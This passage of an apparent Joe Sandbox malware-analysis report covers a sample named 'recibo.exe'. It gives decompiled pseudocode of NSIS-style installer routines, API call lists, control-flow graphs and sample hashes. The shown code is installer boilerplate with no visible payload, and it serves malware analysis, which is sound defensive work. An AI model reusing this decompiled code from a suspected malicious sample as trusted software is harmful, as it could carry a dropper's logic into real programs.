                                                                                  						E004044E5(0x40b);
                                                                                  						while(1) {
                                                                                  							_t36 =  *0x42d250;
                                                                                  							 *0x40a368 =  *0x40a368 + _t36;
                                                                                  							_t133 = _t133 + (_t36 << 6);
                                                                                  							_t38 =  *0x40a368; // 0x0
                                                                                  							__eflags = _t38 -  *0x434f24;
                                                                                  							if(_t38 ==  *0x434f24) {
                                                                                  								E0040140B(1);
                                                                                  							}
                                                                                  							__eflags =  *0x433ecc - _t136; // 0x0
                                                                                  							if(__eflags != 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                                                  							if(__eflags >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t117 =  *(_t133 + 0x14);
                                                                                  							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                  							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                  							_push(0xfffffc19);
                                                                                  							E00404499(_t127);
                                                                                  							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                  							_push(0xfffffc1b);
                                                                                  							E00404499(_t127);
                                                                                  							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                  							_push(0xfffffc1a);
                                                                                  							E00404499(_t127);
                                                                                  							_t48 = GetDlgItem(_t127, 3);
                                                                                  							__eflags =  *0x434f8c - _t136;
                                                                                  							_v28 = _t48;
                                                                                  							if( *0x434f8c != _t136) {
                                                                                  								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                  								__eflags = _t117;
                                                                                  							}
                                                                                  							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                                                  							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                                                  							E004044BB(_t117 & 0x00000002);
                                                                                  							_t118 = _t117 & 0x00000004;
                                                                                  							EnableWindow( *0x42b230, _t118);
                                                                                  							__eflags = _t118 - _t136;
                                                                                  							if(_t118 == _t136) {
                                                                                  								_push(1);
                                                                                  							} else {
                                                                                  								_push(_t136);
                                                                                  							}
                                                                                  							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                                  							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                                  							__eflags =  *0x434f8c - _t136;
                                                                                  							if( *0x434f8c == _t136) {
                                                                                  								_push( *0x42d264);
                                                                                  							} else {
                                                                                  								SendMessageW(_t127, 0x401, 2, _t136);
                                                                                  								_push( *0x42b230);
                                                                                  							}
                                                                                  							E004044CE();
                                                                                  							E0040653D(0x42d268, E00403F7B());
                                                                                  							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                  							SetWindowTextW(_t127, 0x42d268); // executed
                                                                                  							_push(_t136);
                                                                                  							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                  							__eflags = _t67;
                                                                                  							if(_t67 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								__eflags =  *_t133 - _t136;
                                                                                  								if( *_t133 == _t136) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								__eflags =  *(_t133 + 4) - 5;
                                                                                  								if( *(_t133 + 4) != 5) {
                                                                                  									DestroyWindow( *0x433ed8); // executed
                                                                                  									 *0x42c240 = _t133;
                                                                                  									__eflags =  *_t133 - _t136;
                                                                                  									if( *_t133 <= _t136) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                                                  									__eflags = _t73 - _t136;
                                                                                  									 *0x433ed8 = _t73;
                                                                                  									if(_t73 == _t136) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                  									_push(6);
                                                                                  									E00404499(_t73);
                                                                                  									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                                  									ScreenToClient(_t127, _t137 + 0x10);
                                                                                  									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                  									_push(_t136);
                                                                                  									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                  									__eflags =  *0x433ecc - _t136; // 0x0
                                                                                  									if(__eflags != 0) {
                                                                                  										goto L63;
                                                                                  									}
                                                                                  									ShowWindow( *0x433ed8, 8); // executed
                                                                                  									E004044E5(0x405);
                                                                                  									goto L60;
                                                                                  								}
                                                                                  								__eflags =  *0x434f8c - _t136;
                                                                                  								if( *0x434f8c != _t136) {
                                                                                  									goto L63;
                                                                                  								}
                                                                                  								__eflags =  *0x434f80 - _t136;
                                                                                  								if( *0x434f80 != _t136) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								goto L63;
                                                                                  							}
                                                                                  						}
                                                                                  						DestroyWindow( *0x433ed8);
                                                                                  						 *0x434f08 = _t136;
                                                                                  						EndDialog(_t127,  *0x42ba38);
                                                                                  						goto L60;
                                                                                  					} else {
                                                                                  						__eflags = _t34 - 1;
                                                                                  						if(_t34 != 1) {
                                                                                  							L35:
                                                                                  							__eflags =  *_t133 - _t136;
                                                                                  							if( *_t133 == _t136) {
                                                                                  								goto L63;
                                                                                  							}
                                                                                  							goto L36;
                                                                                  						}
                                                                                  						_push(0);
                                                                                  						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                  						__eflags = _t86;
                                                                                  						if(_t86 == 0) {
                                                                                  							goto L35;
                                                                                  						}
                                                                                  						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                                                  						__eflags =  *0x433ecc - _t136; // 0x0
                                                                                  						return 0 | __eflags == 0x00000000;
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t127 = _a4;
                                                                                  					_t136 = 0;
                                                                                  					if(_t130 == 0x47) {
                                                                                  						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                                                  					}
                                                                                  					_t122 = _a12;
                                                                                  					if(_t130 != 5) {
                                                                                  						L8:
                                                                                  						if(_t130 != 0x40d) {
                                                                                  							__eflags = _t130 - 0x11;
                                                                                  							if(_t130 != 0x11) {
                                                                                  								__eflags = _t130 - 0x111;
                                                                                  								if(_t130 != 0x111) {
                                                                                  									L28:
                                                                                  									return E00404500(_a8, _t122, _a16);
                                                                                  								}
                                                                                  								_t135 = _t122 & 0x0000ffff;
                                                                                  								_t128 = GetDlgItem(_t127, _t135);
                                                                                  								__eflags = _t128 - _t136;
                                                                                  								if(_t128 == _t136) {
                                                                                  									L15:
                                                                                  									__eflags = _t135 - 1;
                                                                                  									if(_t135 != 1) {
                                                                                  										__eflags = _t135 - 3;
                                                                                  										if(_t135 != 3) {
                                                                                  											_t129 = 2;
                                                                                  											__eflags = _t135 - _t129;
                                                                                  											if(_t135 != _t129) {
                                                                                  												L27:
                                                                                  												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                                                  												goto L28;
                                                                                  											}
                                                                                  											__eflags =  *0x434f8c - _t136;
                                                                                  											if( *0x434f8c == _t136) {
                                                                                  												_t99 = E0040140B(3);
                                                                                  												__eflags = _t99;
                                                                                  												if(_t99 != 0) {
                                                                                  													goto L28;
                                                                                  												}
                                                                                  												 *0x42ba38 = 1;
                                                                                  												L23:
                                                                                  												_push(0x78);
                                                                                  												L24:
                                                                                  												E00404472();
                                                                                  												goto L28;
                                                                                  											}
                                                                                  											E0040140B(_t129);
                                                                                  											 *0x42ba38 = _t129;
                                                                                  											goto L23;
                                                                                  										}
                                                                                  										__eflags =  *0x40a368 - _t136; // 0x0
                                                                                  										if(__eflags <= 0) {
                                                                                  											goto L27;
                                                                                  										}
                                                                                  										_push(0xffffffff);
                                                                                  										goto L24;
                                                                                  									}
                                                                                  									_push(_t135);
                                                                                  									goto L24;
                                                                                  								}
                                                                                  								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                  								_t103 = IsWindowEnabled(_t128);
                                                                                  								__eflags = _t103;
                                                                                  								if(_t103 == 0) {
                                                                                  									L63:
                                                                                  									return 0;
                                                                                  								}
                                                                                  								goto L15;
                                                                                  							}
                                                                                  							SetWindowLongW(_t127, _t136, _t136);
                                                                                  							return 1;
                                                                                  						}
                                                                                  						DestroyWindow( *0x433ed8);
                                                                                  						 *0x433ed8 = _t122;
                                                                                  						L60:
                                                                                  						if( *0x42f268 == _t136) {
                                                                                  							_t146 =  *0x433ed8 - _t136; // 0x1043c
                                                                                  							if(_t146 != 0) {
                                                                                  								ShowWindow(_t127, 0xa); // executed
                                                                                  								 *0x42f268 = 1;
                                                                                  							}
                                                                                  						}
                                                                                  						goto L63;
                                                                                  					}
                                                                                  					asm("sbb eax, eax");
                                                                                  					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                                                  					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                  						goto L28;
                                                                                  					} else {
                                                                                  						ShowWindow(_t127, 4);
                                                                                  						goto L8;
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  0x00000000
                                                                                  0x00404021
                                                                                  0x00403fff

                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                  • ShowWindow.USER32(?), ref: 00403FF6
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                  • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                  • DestroyWindow.USER32 ref: 00404035
                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                  • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                  • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                  • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                  • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                  • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                  • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 121052019-0
                                                                                  • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                  • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                  • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                  • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 313 403c72-403c9b call 403ec2 call 405f14 304->313 309 403c51-403c62 call 40640b 305->309 310 403c67-403c6d lstrcatW 305->310 309->310 310->313 319 403ca1-403ca6 313->319 320 403d2d-403d35 call 405f14 313->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 331 403cd6-403cda 321->331 329 403de9-403df1 call 40140b 326->329 330 403d6a-403d9a RegisterClassW 326->330 327->326 344 403df3-403df6 329->344 345 403dfb-403e06 call 403ec2 329->345 332 403da0-403de4 SystemParametersInfoW CreateWindowExW 330->332 333 403eb8 330->333 335 403cec-403cf8 lstrlenW 331->335 336 403cdc-403ce9 call 405e39 331->336 332->329 338 403eba-403ec1 333->338 339 403d20-403d28 call 405e0c call 40653d 335->339 340 403cfa-403d08 lstrcmpiW 335->340 336->335 339->320 340->339 343 403d0a-403d14 GetFileAttributesW 340->343 347 403d16-403d18 343->347 348 403d1a-403d1b call 405e58 343->348 344->338 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 347->339 347->348 348->339 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->333 361->344 366 403ea5-403eac call 40140b 361->366 364 403e46-403e56 GetClassInfoW RegisterClassW 362->364 365 403e5c-403e7f DialogBoxParamW call 40140b 362->365 363->362 364->365 371 403e84-403e8d call 403b3c 365->371 366->344 371->338
                                                                                  C-Code - Quality: 96%
                                                                                  			E00403BEC(void* __eflags) {
                                                                                  				intOrPtr _v4;
                                                                                  				intOrPtr _v8;
                                                                                  				int _v12;
                                                                                  				void _v16;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				intOrPtr* _t22;
                                                                                  				void* _t30;
                                                                                  				void* _t32;
                                                                                  				int _t33;
                                                                                  				void* _t36;
                                                                                  				int _t39;
                                                                                  				int _t40;
                                                                                  				intOrPtr _t41;
                                                                                  				int _t44;
                                                                                  				short _t63;
                                                                                  				WCHAR* _t65;
                                                                                  				signed char _t69;
                                                                                  				WCHAR* _t76;
                                                                                  				intOrPtr _t82;
                                                                                  				WCHAR* _t87;
                                                                                  
                                                                                  				_t82 =  *0x434f10;
                                                                                  				_t22 = E0040690A(2);
                                                                                  				_t90 = _t22;
                                                                                  				if(_t22 == 0) {
                                                                                  					_t76 = 0x42d268;
                                                                                  					L"1033" = 0x30;
                                                                                  					 *0x442002 = 0x78;
                                                                                  					 *0x442004 = 0;
                                                                                  					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                                                  					__eflags =  *0x42d268;
                                                                                  					if(__eflags == 0) {
                                                                                  						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                                                  					}
                                                                                  					lstrcatW(L"1033", _t76);
                                                                                  				} else {
                                                                                  					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                                                  				}
                                                                                  				E00403EC2(_t78, _t90);
                                                                                  				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                                                  				 *0x434f9c = 0x10000;
                                                                                  				if(E00405F14(_t90, 0x440800) != 0) {
                                                                                  					L16:
                                                                                  					if(E00405F14(_t98, 0x440800) == 0) {
                                                                                  						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                  					}
                                                                                  					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                  					 *0x433ee8 = _t30;
                                                                                  					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                  						L21:
                                                                                  						if(E0040140B(0) == 0) {
                                                                                  							_t32 = E00403EC2(_t78, __eflags);
                                                                                  							__eflags =  *0x434fa0;
                                                                                  							if( *0x434fa0 != 0) {
                                                                                  								_t33 = E00405672(_t32, 0);
                                                                                  								__eflags = _t33;
                                                                                  								if(_t33 == 0) {
                                                                                  									E0040140B(1);
                                                                                  									goto L33;
                                                                                  								}
                                                                                  								__eflags =  *0x433ecc; // 0x0
                                                                                  								if(__eflags == 0) {
                                                                                  									E0040140B(2);
                                                                                  								}
                                                                                  								goto L22;
                                                                                  							}
                                                                                  							ShowWindow( *0x42d248, 5); // executed
                                                                                  							_t39 = E0040689A("RichEd20"); // executed
                                                                                  							__eflags = _t39;
                                                                                  							if(_t39 == 0) {
                                                                                  								E0040689A("RichEd32");
                                                                                  							}
                                                                                  							_t87 = L"RichEdit20W";
                                                                                  							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                                                  							__eflags = _t40;
                                                                                  							if(_t40 == 0) {
                                                                                  								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                                                  								 *0x433ec4 = _t87;
                                                                                  								RegisterClassW(0x433ea0);
                                                                                  							}
                                                                                  							_t41 =  *0x433ee0; // 0x0
                                                                                  							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                                                  							E00403B3C(E0040140B(5), 1);
                                                                                  							return _t44;
                                                                                  						}
                                                                                  						L22:
                                                                                  						_t36 = 2;
                                                                                  						return _t36;
                                                                                  					} else {
                                                                                  						_t78 =  *0x434f00;
                                                                                  						 *0x433ea4 = E00401000;
                                                                                  						 *0x433eb0 =  *0x434f00;
                                                                                  						 *0x433eb4 = _t30;
                                                                                  						 *0x433ec4 = 0x40a380;
                                                                                  						if(RegisterClassW(0x433ea0) == 0) {
                                                                                  							L33:
                                                                                  							__eflags = 0;
                                                                                  							return 0;
                                                                                  						}
                                                                                  						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                  						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                                                  						goto L21;
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t78 =  *(_t82 + 0x48);
                                                                                  					_t92 = _t78;
                                                                                  					if(_t78 == 0) {
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					_t76 = 0x432ea0;
                                                                                  					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                                                  					_t63 =  *0x432ea0; // 0x43
                                                                                  					if(_t63 == 0) {
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					if(_t63 == 0x22) {
                                                                                  						_t76 = 0x432ea2;
                                                                                  						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                                                  					}
                                                                                  					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                  					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                  						L15:
                                                                                  						E0040653D(0x440800, E00405E0C(_t76));
                                                                                  						goto L16;
                                                                                  					} else {
                                                                                  						_t69 = GetFileAttributesW(_t76);
                                                                                  						if(_t69 == 0xffffffff) {
                                                                                  							L14:
                                                                                  							E00405E58(_t76);
                                                                                  							goto L15;
                                                                                  						}
                                                                                  						_t98 = _t69 & 0x00000010;
                                                                                  						if((_t69 & 0x00000010) != 0) {
                                                                                  							goto L15;
                                                                                  						}
                                                                                  						goto L14;
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  0x00403de4
                                                                                  0x00000000
                                                                                  0x00403de4
                                                                                  0x00403ca1
                                                                                  0x00403ca1
                                                                                  0x00403ca4
                                                                                  0x00403ca6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403cb4
                                                                                  0x00403cc6
                                                                                  0x00403ccb
                                                                                  0x00403cd4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403cda
                                                                                  0x00403cdc
                                                                                  0x00403ce9
                                                                                  0x00403ce9
                                                                                  0x00403cf2
                                                                                  0x00403cf8
                                                                                  0x00403d20
                                                                                  0x00403d28
                                                                                  0x00000000
                                                                                  0x00403d0a
                                                                                  0x00403d0b
                                                                                  0x00403d14
                                                                                  0x00403d1a
                                                                                  0x00403d1b
                                                                                  0x00000000
                                                                                  0x00403d1b
                                                                                  0x00403d16
                                                                                  0x00403d18
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403d18
                                                                                  0x00403cf8

                                                                                  APIs
                                                                                    • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                    • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                  • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,77343420), ref: 00403CED
                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                  • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00440800), ref: 00403D54
                                                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                  • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                  • API String ID: 1975747703-3228750522
                                                                                  • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                  • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                  • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                  • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 395 403200-403203 387->395 396 403253-403258 387->396 390 403110-403127 388->390 391 403129 390->391 392 40312b-403134 call 4034cf 390->392 391->392 401 40325a-403262 call 403019 392->401 402 40313a-403141 392->402 398 403205-40321d call 4034e5 call 4034cf 395->398 399 403227-403251 GlobalAlloc call 4034e5 call 4032b4 395->399 396->380 398->396 421 40321f-403225 398->421 399->396 426 403264-403275 399->426 401->396 405 403143-403157 call 405fe8 402->405 406 4031bd-4031c1 402->406 411 4031cb-4031d1 405->411 424 403159-403160 405->424 410 4031c3-4031ca call 403019 406->410 406->411 410->411 417 4031e0-4031e8 411->417 418 4031d3-4031dd call 4069f7 411->418 417->390 425 4031ee 417->425 418->417 421->396 421->399 424->411 428 403162-403169 424->428 425->387 429 403277 426->429 430 40327d-403282 426->430 428->411 432 40316b-403172 428->432 429->430 431 403283-403289 430->431 431->431 433 40328b-4032a6 SetFilePointer call 405fe8 431->433 432->411 434 403174-40317b 432->434 437 4032ab 433->437 434->411 436 40317d-40319d 434->436 436->396 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->411 441 4031b9-4031bb 440->441 441->411
                                                                                  C-Code - Quality: 80%
                                                                                  			E0040307D(void* __eflags, signed int _a4) {
                                                                                  				DWORD* _v8;
                                                                                  				DWORD* _v12;
                                                                                  				void* _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				char _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				signed int _v44;
                                                                                  				long _t43;
                                                                                  				signed int _t50;
                                                                                  				void* _t53;
                                                                                  				void* _t57;
                                                                                  				intOrPtr* _t59;
                                                                                  				long _t60;
                                                                                  				signed int _t65;
                                                                                  				signed int _t70;
                                                                                  				signed int _t71;
                                                                                  				signed int _t77;
                                                                                  				intOrPtr _t80;
                                                                                  				long _t82;
                                                                                  				signed int _t85;
                                                                                  				signed int _t87;
                                                                                  				void* _t89;
                                                                                  				signed int _t90;
                                                                                  				signed int _t93;
                                                                                  				void* _t94;
                                                                                  
                                                                                  				_t82 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_t43 = GetTickCount();
                                                                                  				_t91 = L"C:\\Users\\Arthur\\Desktop\\recibo.exe";
                                                                                  				 *0x434f0c = _t43 + 0x3e8;
                                                                                  				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\recibo.exe", 0x400);
                                                                                  				_t89 = E0040602D(_t91, 0x80000000, 3);
                                                                                  				_v16 = _t89;
                                                                                  				 *0x40a018 = _t89;
                                                                                  				if(_t89 == 0xffffffff) {
                                                                                  					return L"Error launching installer";
                                                                                  				}
                                                                                  				E0040653D(0x441800, _t91);
                                                                                  				E0040653D(0x444000, E00405E58(0x441800));
                                                                                  				_t50 = GetFileSize(_t89, 0);
                                                                                  				__eflags = _t50;
                                                                                  				 *0x42aa24 = _t50;
                                                                                  				_t93 = _t50;
                                                                                  				if(_t50 <= 0) {
                                                                                  					L24:
                                                                                  					E00403019(1);
                                                                                  					__eflags =  *0x434f14 - _t82;
                                                                                  					if( *0x434f14 == _t82) {
                                                                                  						goto L29;
                                                                                  					}
                                                                                  					__eflags = _v8 - _t82;
                                                                                  					if(_v8 == _t82) {
                                                                                  						L28:
                                                                                  						_t34 =  &_v24; // 0x40387d
                                                                                  						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                                                  						_t94 = _t53;
                                                                                  						E004034E5( *0x434f14 + 0x1c);
                                                                                  						_t35 =  &_v24; // 0x40387d
                                                                                  						_push( *_t35);
                                                                                  						_push(_t94);
                                                                                  						_push(_t82);
                                                                                  						_push(0xffffffff); // executed
